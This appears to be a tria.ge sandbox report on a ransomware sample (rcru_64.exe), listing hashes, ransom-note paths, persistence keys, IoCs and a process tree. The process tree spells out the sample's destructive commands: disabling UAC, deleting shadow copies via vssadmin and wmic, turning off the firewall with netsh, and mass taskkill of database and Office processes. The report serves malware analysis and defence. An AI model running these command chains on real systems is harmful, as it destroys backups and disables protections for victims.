Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
148s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
01/04/2021, 09:52
Static task
static1
Behavioral task
behavioral1
Sample
rcru_64.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
rcru_64.exe
Resource
win10v20201028
General
-
Target
rcru_64.exe
-
Size
1.0MB
-
MD5
0d5d7377432ee449f30626c2371a0080
-
SHA1
56a1d1203d62c131b70837d75af79aa19a3b0487
-
SHA256
94c8cf0e19aa11a48a57baf54cc3679dda1dac4ad59ece1bf86ef117a974ddf9
-
SHA512
19980615dbcba8ca8151aa5b93bc614b79edd1d77abbe37293001ecf16991cc939afca1cf62cac90c05510174cb8b7521a3074fbc160b47fd53d374521e06f0a
Malware Config
Extracted
\??\c:\Read_Me!_.txt
Extracted
C:\Users\Admin\Desktop\ReadMe_Now!.hta
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 3 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification \??\c:\Users\Admin\Pictures\SendRedo.tiff rcru_64.exe File opened for modification \??\c:\Users\Admin\Pictures\StepPush.tiff rcru_64.exe File opened for modification \??\c:\Users\Admin\Pictures\UnpublishUnregister.tiff rcru_64.exe -
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe rcru_64.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe rcru_64.exe File created \??\c:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Read_Me!_.txt rcru_64.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Read-Me.hta rcru_64.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Machin_Updaters = "c:\\$Recycle.Bin\\RCRU_64.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\Machin_Update = "c:\\$Recycle.Bin\\RCRU_64.exe" reg.exe Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run reg.exe -
Drops desktop.ini file(s) 19 IoCs
description ioc Process File opened for modification \??\c:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini rcru_64.exe File opened for modification \??\c:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini rcru_64.exe File opened for modification \??\c:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini rcru_64.exe File opened for modification \??\c:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini rcru_64.exe File opened for modification \??\c:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini rcru_64.exe File opened for modification \??\c:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini rcru_64.exe File opened for modification \??\c:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini rcru_64.exe File opened for modification \??\c:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini rcru_64.exe File opened for modification \??\c:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini rcru_64.exe File opened for modification \??\c:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini rcru_64.exe File opened for modification \??\c:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini rcru_64.exe File opened for modification \??\c:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini rcru_64.exe File opened for modification \??\c:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini rcru_64.exe File opened for modification \??\c:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini rcru_64.exe File opened for modification \??\c:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini rcru_64.exe File opened for modification \??\c:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini rcru_64.exe File opened for modification \??\c:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI rcru_64.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\o: rcru_64.exe File opened (read-only) \??\f: rcru_64.exe File opened (read-only) \??\b: rcru_64.exe File opened (read-only) \??\j: rcru_64.exe File opened (read-only) \??\i: rcru_64.exe File opened (read-only) \??\n: rcru_64.exe File opened (read-only) \??\p: rcru_64.exe File opened (read-only) \??\z: rcru_64.exe File opened (read-only) \??\s: rcru_64.exe File opened (read-only) \??\w: rcru_64.exe File opened (read-only) \??\m: rcru_64.exe File opened (read-only) \??\a: rcru_64.exe File opened (read-only) \??\k: rcru_64.exe File opened (read-only) \??\x: rcru_64.exe File opened (read-only) \??\q: rcru_64.exe File opened (read-only) \??\u: rcru_64.exe File opened (read-only) \??\y: rcru_64.exe File opened (read-only) \??\e: rcru_64.exe File opened (read-only) \??\g: rcru_64.exe File opened (read-only) \??\h: rcru_64.exe File opened (read-only) \??\l: rcru_64.exe File opened (read-only) \??\r: rcru_64.exe File opened (read-only) \??\t: rcru_64.exe File opened (read-only) \??\v: rcru_64.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Niue rcru_64.exe File opened for modification \??\c:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\main.html rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14793_.GIF rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\WANS.NET.XML rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\COUPON.POC rcru_64.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\calendars.properties rcru_64.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.metadataprovider.exsd rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Country.css rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TN01308_.WMF rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB00516L.GIF rcru_64.exe File opened for modification \??\c:\Program Files\Google\Chrome\Application\86.0.4240.111\Locales\ms.pak rcru_64.exe File opened for modification \??\c:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\System.Web.Extensions.Design.dll rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00200_.WMF rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187847.WMF rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0241773.WMF rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387604.JPG rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\Office14\ACCDDSF.DLL rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewAttachmentIcons.jpg rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\daisies.png rcru_64.exe File opened for modification \??\c:\Program Files\7-Zip\License.txt rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD01548_.WMF rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.UK.XML rcru_64.exe File created \??\c:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\Read_Me!_.txt rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\System.Xml.Linq.dll rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_thunderstorm.png rcru_64.exe File opened for modification \??\c:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationRight_ButtonGraphic.png rcru_64.exe File created \??\c:\Program Files\Google\Chrome\Application\86.0.4240.111\WidevineCdm\_platform_specific\Read_Me!_.txt rcru_64.exe File opened for modification \??\c:\Program Files\Java\jre7\lib\zi\Pacific\Chuuk rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Apothecary.xml rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\STOPICON.JPG rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGPICCAP.XML rcru_64.exe File created \??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\Read_Me!_.txt rcru_64.exe File created \??\c:\Program Files\Windows Mail\en-US\Read_Me!_.txt rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\GRID_01.MID rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01734_.GIF rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\Office14\1033\PPINTL.REST.IDX_DLL rcru_64.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Melbourne rcru_64.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_zh_CN.jar rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04117_.WMF rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\Hiring Requisition - Customized.fdt rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\SIGNHM.POC rcru_64.exe File opened for modification \??\c:\Program Files\Common Files\System\ado\msado25.tlb rcru_64.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Baghdad rcru_64.exe File created \??\c:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\Read_Me!_.txt rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH01618_.WMF rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00898_.WMF rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\Office14\ADDINS\BCSAddin.dll rcru_64.exe File opened for modification \??\c:\Program Files\Java\jre7\lib\zi\Asia\Beirut rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01039_.WMF rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10263_.GIF rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_pressed.png rcru_64.exe File opened for modification \??\c:\Program Files\7-Zip\Lang\lv.txt rcru_64.exe File opened for modification \??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\mc.jar rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormToolImages.jpg rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\10.png rcru_64.exe File opened for modification \??\c:\Program Files\Common Files\System\Ole DB\oledbjvs.inc rcru_64.exe File opened for modification \??\c:\Program Files\VideoLAN\VLC\plugins\stream_filter\libcache_read_plugin.dll rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\Office14\1033\STSLISTI.DLL rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\Office14\EntityPicker.dll rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\30.png rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\HEADER.GIF rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.dll rcru_64.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Adjacency.xml rcru_64.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1972 vssadmin.exe -
Kills process with taskkill 40 IoCs
pid Process 1380 taskkill.exe 916 taskkill.exe 1996 taskkill.exe 2008 taskkill.exe 1056 taskkill.exe 664 taskkill.exe 1812 taskkill.exe 284 taskkill.exe 1196 taskkill.exe 284 taskkill.exe 304 taskkill.exe 1896 taskkill.exe 916 taskkill.exe 1188 taskkill.exe 804 taskkill.exe 1984 taskkill.exe 1772 taskkill.exe 556 taskkill.exe 1224 taskkill.exe 668 taskkill.exe 1784 taskkill.exe 1352 taskkill.exe 1784 taskkill.exe 1764 taskkill.exe 468 taskkill.exe 1692 taskkill.exe 1984 taskkill.exe 1624 taskkill.exe 1456 taskkill.exe 1224 taskkill.exe 1304 taskkill.exe 976 taskkill.exe 1612 taskkill.exe 1776 taskkill.exe 1716 taskkill.exe 1616 taskkill.exe 296 taskkill.exe 1584 taskkill.exe 1456 taskkill.exe 1584 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry key 1 TTPs 3 IoCs
pid Process 1976 reg.exe 1188 reg.exe 896 reg.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeBackupPrivilege 1316 vssvc.exe Token: SeRestorePrivilege 1316 vssvc.exe Token: SeAuditPrivilege 1316 vssvc.exe Token: SeIncreaseQuotaPrivilege 1772 WMIC.exe Token: SeSecurityPrivilege 1772 WMIC.exe Token: SeTakeOwnershipPrivilege 1772 WMIC.exe Token: SeLoadDriverPrivilege 1772 WMIC.exe Token: SeSystemProfilePrivilege 1772 WMIC.exe Token: SeSystemtimePrivilege 1772 WMIC.exe Token: SeProfSingleProcessPrivilege 1772 WMIC.exe Token: SeIncBasePriorityPrivilege 1772 WMIC.exe Token: SeCreatePagefilePrivilege 1772 WMIC.exe Token: SeBackupPrivilege 1772 WMIC.exe Token: SeRestorePrivilege 1772 WMIC.exe Token: SeShutdownPrivilege 1772 WMIC.exe Token: SeDebugPrivilege 1772 WMIC.exe Token: SeSystemEnvironmentPrivilege 1772 WMIC.exe Token: SeRemoteShutdownPrivilege 1772 WMIC.exe Token: SeUndockPrivilege 1772 WMIC.exe Token: SeManageVolumePrivilege 1772 WMIC.exe Token: 33 1772 WMIC.exe Token: 34 1772 WMIC.exe Token: 35 1772 WMIC.exe Token: SeIncreaseQuotaPrivilege 1772 WMIC.exe Token: SeSecurityPrivilege 1772 WMIC.exe Token: SeTakeOwnershipPrivilege 1772 WMIC.exe Token: SeLoadDriverPrivilege 1772 WMIC.exe Token: SeSystemProfilePrivilege 1772 WMIC.exe Token: SeSystemtimePrivilege 1772 WMIC.exe Token: SeProfSingleProcessPrivilege 1772 WMIC.exe Token: SeIncBasePriorityPrivilege 1772 WMIC.exe Token: SeCreatePagefilePrivilege 1772 WMIC.exe Token: SeBackupPrivilege 1772 WMIC.exe Token: SeRestorePrivilege 1772 WMIC.exe Token: SeShutdownPrivilege 1772 WMIC.exe Token: SeDebugPrivilege 1772 WMIC.exe Token: SeSystemEnvironmentPrivilege 1772 WMIC.exe Token: SeRemoteShutdownPrivilege 1772 WMIC.exe Token: SeUndockPrivilege 1772 WMIC.exe Token: SeManageVolumePrivilege 1772 WMIC.exe Token: 33 1772 WMIC.exe Token: 34 1772 WMIC.exe Token: 35 1772 WMIC.exe Token: SeDebugPrivilege 1224 taskkill.exe Token: SeDebugPrivilege 1984 taskkill.exe Token: SeDebugPrivilege 1784 taskkill.exe Token: SeDebugPrivilege 1584 taskkill.exe Token: SeDebugPrivilege 1352 taskkill.exe Token: SeDebugPrivilege 976 taskkill.exe Token: SeDebugPrivilege 1764 taskkill.exe Token: SeDebugPrivilege 1812 taskkill.exe Token: SeDebugPrivilege 304 taskkill.exe Token: SeDebugPrivilege 1624 taskkill.exe Token: SeDebugPrivilege 2008 taskkill.exe Token: SeDebugPrivilege 1896 taskkill.exe Token: SeDebugPrivilege 1612 taskkill.exe Token: SeDebugPrivilege 1456 taskkill.exe Token: SeDebugPrivilege 1056 taskkill.exe Token: SeDebugPrivilege 284 taskkill.exe Token: SeDebugPrivilege 916 taskkill.exe Token: SeDebugPrivilege 1188 taskkill.exe Token: SeDebugPrivilege 1996 taskkill.exe Token: SeDebugPrivilege 1776 taskkill.exe Token: SeDebugPrivilege 1716 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1152 wrote to memory of 2032 1152 rcru_64.exe 27 PID 1152 wrote to memory of 2032 1152 rcru_64.exe 27 PID 1152 wrote to memory of 2032 1152 rcru_64.exe 27 PID 1152 wrote to memory of 2032 1152 rcru_64.exe 27 PID 2032 wrote to memory of 1976 2032 cmd.exe 28 PID 2032 wrote to memory of 1976 2032 cmd.exe 28 PID 2032 wrote to memory of 1976 2032 cmd.exe 28 PID 2032 wrote to memory of 1976 2032 cmd.exe 28 PID 2032 wrote to memory of 1972 2032 cmd.exe 29 PID 2032 wrote to memory of 1972 2032 cmd.exe 29 PID 2032 wrote to memory of 1972 2032 cmd.exe 29 PID 2032 wrote to memory of 1972 2032 cmd.exe 29 PID 2032 wrote to memory of 1772 2032 cmd.exe 31 PID 2032 wrote to memory of 1772 2032 cmd.exe 31 PID 2032 wrote to memory of 1772 2032 cmd.exe 31 PID 2032 wrote to memory of 1772 2032 cmd.exe 31 PID 2032 wrote to memory of 1764 2032 cmd.exe 36 PID 2032 wrote to memory of 1764 2032 cmd.exe 36 PID 2032 wrote to memory of 1764 2032 cmd.exe 36 PID 2032 wrote to memory of 1764 2032 cmd.exe 36 PID 2032 wrote to memory of 916 2032 cmd.exe 37 PID 2032 wrote to memory of 916 2032 cmd.exe 37 PID 2032 wrote to memory of 916 2032 cmd.exe 37 PID 2032 wrote to memory of 916 2032 cmd.exe 37 PID 2032 wrote to memory of 544 2032 cmd.exe 38 PID 2032 wrote to memory of 544 2032 cmd.exe 38 PID 2032 wrote to memory of 544 2032 cmd.exe 38 PID 2032 wrote to memory of 544 2032 cmd.exe 38 PID 1152 wrote to memory of 1108 1152 rcru_64.exe 39 PID 1152 wrote to memory of 1108 1152 rcru_64.exe 39 PID 1152 wrote to memory of 1108 1152 rcru_64.exe 39 PID 1152 wrote to memory of 1108 1152 rcru_64.exe 39 PID 1108 wrote to memory of 1224 1108 cmd.exe 40 PID 1108 wrote to memory of 1224 1108 cmd.exe 40 PID 1108 wrote to memory of 1224 1108 cmd.exe 40 PID 1108 wrote to memory of 1224 1108 cmd.exe 40 PID 1108 wrote to memory of 1984 1108 cmd.exe 42 PID 1108 wrote to memory of 1984 1108 cmd.exe 42 PID 1108 wrote to memory of 1984 1108 cmd.exe 42 PID 1108 wrote to memory of 1984 1108 cmd.exe 42 PID 1108 wrote to memory of 1784 1108 cmd.exe 43 PID 1108 wrote to memory of 1784 1108 cmd.exe 43 PID 1108 wrote to memory of 1784 1108 cmd.exe 43 PID 1108 wrote to memory of 1784 1108 cmd.exe 43 PID 1108 wrote to memory of 1584 1108 cmd.exe 44 PID 1108 wrote to memory of 1584 1108 cmd.exe 44 PID 1108 wrote to memory of 1584 1108 cmd.exe 44 PID 1108 wrote to memory of 1584 1108 cmd.exe 44 PID 1108 wrote to memory of 1352 1108 cmd.exe 45 PID 1108 wrote to memory of 1352 1108 cmd.exe 45 PID 1108 wrote to memory of 1352 1108 cmd.exe 45 PID 1108 wrote to memory of 1352 1108 cmd.exe 45 PID 1108 wrote to memory of 976 1108 cmd.exe 46 PID 1108 wrote to memory of 976 1108 cmd.exe 46 PID 1108 wrote to memory of 976 1108 cmd.exe 46 PID 1108 wrote to memory of 976 1108 cmd.exe 46 PID 1108 wrote to memory of 1764 1108 cmd.exe 47 PID 1108 wrote to memory of 1764 1108 cmd.exe 47 PID 1108 wrote to memory of 1764 1108 cmd.exe 47 PID 1108 wrote to memory of 1764 1108 cmd.exe 47 PID 1108 wrote to memory of 1812 1108 cmd.exe 48 PID 1108 wrote to memory of 1812 1108 cmd.exe 48 PID 1108 wrote to memory of 1812 1108 cmd.exe 48 PID 1108 wrote to memory of 1812 1108 cmd.exe 48
Processes
-
C:\Users\Admin\AppData\Local\Temp\rcru_64.exe"C:\Users\Admin\AppData\Local\Temp\rcru_64.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes2⤵
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- Modifies registry key
PID:1976
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:1972
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1772
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off3⤵PID:1764
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵PID:916
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall set rule group="Network Discovery" new enable=Yes3⤵PID:544
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /im notepad.exe&taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im notepad.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1224
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im msftesql.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlagent.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1784
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlbrowser.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1584
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlservr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1352
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlwriter.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:976
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im oracle.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1764
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ocssd.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1812
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im dbsnmp.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:304
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im synctime.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1624
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im agntsvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2008
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mydesktopqos.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1896
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im isqlplussvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1612
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im xfssvccon.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1456
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mydesktopservice.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1056
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ocautoupds.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:284
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im agntsvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:916
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im encsvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1188
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im firefoxconfig.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1996
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im tbirdconfig.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1776
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ocomm.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mysqld.exe3⤵
- Kills process with taskkill
PID:1616
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mysqld-nt.exe3⤵
- Kills process with taskkill
PID:664
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mysqld-opt.exe3⤵
- Kills process with taskkill
PID:804
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im dbeng50.exe3⤵
- Kills process with taskkill
PID:468
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqbcoreservice.exe3⤵
- Kills process with taskkill
PID:668
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im excel.exe3⤵
- Kills process with taskkill
PID:1196
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im infopath.exe3⤵
- Kills process with taskkill
PID:1224
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im msaccess.exe3⤵
